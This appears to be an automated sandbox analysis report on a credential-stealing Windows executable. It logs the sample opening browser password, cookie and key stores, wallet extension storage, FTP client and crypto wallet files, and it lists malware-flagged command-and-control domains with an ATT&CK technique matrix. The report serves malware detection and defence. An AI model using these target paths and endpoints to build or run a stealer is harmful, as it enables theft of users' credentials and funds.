                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: Yara matchFile source: 00000000.00000003.1602681941.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Wvo9FU4qo9.exe PID: 6596, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: Wvo9FU4qo9.exe PID: 6596, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                Process Injection
                44
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                Query Registry
                Remote Services1
                Archive Collected Data
                21
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                1
                Process Injection
                LSASS Memory861
                Security Software Discovery
                Remote Desktop Protocol41
                Data from Local System
                2
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell
                Logon Script (Windows)Logon Script (Windows)11
                Deobfuscate/Decode Files or Information
                Security Account Manager44
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive113
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
                Obfuscated Files or Information
                NTDS2
                Process Discovery
                Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing
                LSA Secrets1
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials223
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Wvo9FU4qo9.exe100%AviraTR/Crypt.XPACK.Gen
                Wvo9FU4qo9.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://mindhandru.buzz:443/apiion.txtPK100%Avira URL Cloudmalware
                https://mindhandru.buzz/l100%Avira URL Cloudmalware
                https://mindhandru.buzz/api0100%Avira URL Cloudmalware
                https://mindhandru.buzz/gL0100%Avira URL Cloudmalware
                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.0%Avira URL Cloudsafe
                https://mindhandru.buzz/ZQ100%Avira URL Cloudmalware
                https://mindhandru.buzz/pi=100%Avira URL Cloudmalware
                https://mindhandru.buzz:443/apixxd8pi.default-release/key4.dbPK100%Avira URL Cloudmalware
                https://mindhandru.buzz/apiryBI100%Avira URL Cloudmalware
                https://mindhandru.buzz/%100%Avira URL Cloudmalware
                https://mindhandru.buzz/3e100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                mindhandru.buzz
                104.21.11.101
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  scentniej.buzzfalse
                    high
                    rebuildeso.buzzfalse
                      high
                      appliacnesot.buzzfalse
                        high
                        screwamusresz.buzzfalse
                          high
                          cashfuzysao.buzzfalse
                            high
                            inherineau.buzzfalse
                              high
                              prisonyfork.buzzfalse
                                high
                                hummskitnj.buzzfalse
                                  high
                                  mindhandru.buzzfalse
                                    high
                                    https://mindhandru.buzz/apifalse
                                      high
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabWvo9FU4qo9.exe, 00000000.00000003.1525110185.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525222713.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525039980.00000000057FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://duckduckgo.com/ac/?q=Wvo9FU4qo9.exe, 00000000.00000003.1525110185.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525222713.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525039980.00000000057FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoWvo9FU4qo9.exe, 00000000.00000003.1525110185.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525222713.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525039980.00000000057FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://mindhandru.buzz/pi=Wvo9FU4qo9.exe, 00000000.00000002.1671523161.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1670178773.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://mindhandru.buzz:443/apiion.txtPKWvo9FU4qo9.exe, 00000000.00000002.1671306790.0000000000F43000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://mindhandru.buzz/Wvo9FU4qo9.exe, 00000000.00000002.1671523161.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1670178773.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Wvo9FU4qo9.exe, 00000000.00000003.1525110185.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525222713.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525039980.00000000057FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://crl.rootca1.amazontrust.com/rootca1.crl0Wvo9FU4qo9.exe, 00000000.00000003.1570420563.0000000005872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://mindhandru.buzz/api0Wvo9FU4qo9.exe, 00000000.00000002.1671523161.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1670178773.0000000000F67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://mindhandru.buzz/lWvo9FU4qo9.exe, 00000000.00000002.1671523161.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1670178773.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Wvo9FU4qo9.exe, 00000000.00000003.1525110185.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525222713.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525039980.00000000057FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://ocsp.rootca1.amazontrust.com0:Wvo9FU4qo9.exe, 00000000.00000003.1570420563.0000000005872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://mindhandru.buzz/ZQWvo9FU4qo9.exe, 00000000.00000003.1598596473.0000000005841000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1570295683.000000000584C000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1570035019.0000000005849000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1598617419.0000000005849000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1598795849.000000000584F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://mindhandru.buzz/piWvo9FU4qo9.exe, 00000000.00000002.1671523161.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1670178773.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5Wvo9FU4qo9.exe, 00000000.00000003.1571718696.00000000058A5000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1571675942.00000000058A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.ecosia.org/newtab/Wvo9FU4qo9.exe, 00000000.00000003.1525110185.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525222713.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525039980.00000000057FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brWvo9FU4qo9.exe, 00000000.00000003.1571404136.0000000005AE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.Wvo9FU4qo9.exe, 00000000.00000003.1571718696.00000000058A5000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1571675942.00000000058A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://mindhandru.buzz/%Wvo9FU4qo9.exe, 00000000.00000002.1671523161.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1670178773.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://mindhandru.buzz:443/apiWvo9FU4qo9.exe, 00000000.00000002.1671306790.0000000000F43000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://ac.ecosia.org/autocomplete?q=Wvo9FU4qo9.exe, 00000000.00000003.1525110185.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525222713.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525039980.00000000057FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://mindhandru.buzz/gL0Wvo9FU4qo9.exe, 00000000.00000002.1673430816.000000000584F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  http://crl.microWvo9FU4qo9.exe, 00000000.00000003.1641288958.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1669919961.0000000000FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgWvo9FU4qo9.exe, 00000000.00000003.1571718696.00000000058A5000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1571675942.00000000058A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://x1.c.lencr.org/0Wvo9FU4qo9.exe, 00000000.00000003.1570420563.0000000005872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://x1.i.lencr.org/0Wvo9FU4qo9.exe, 00000000.00000003.1570420563.0000000005872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
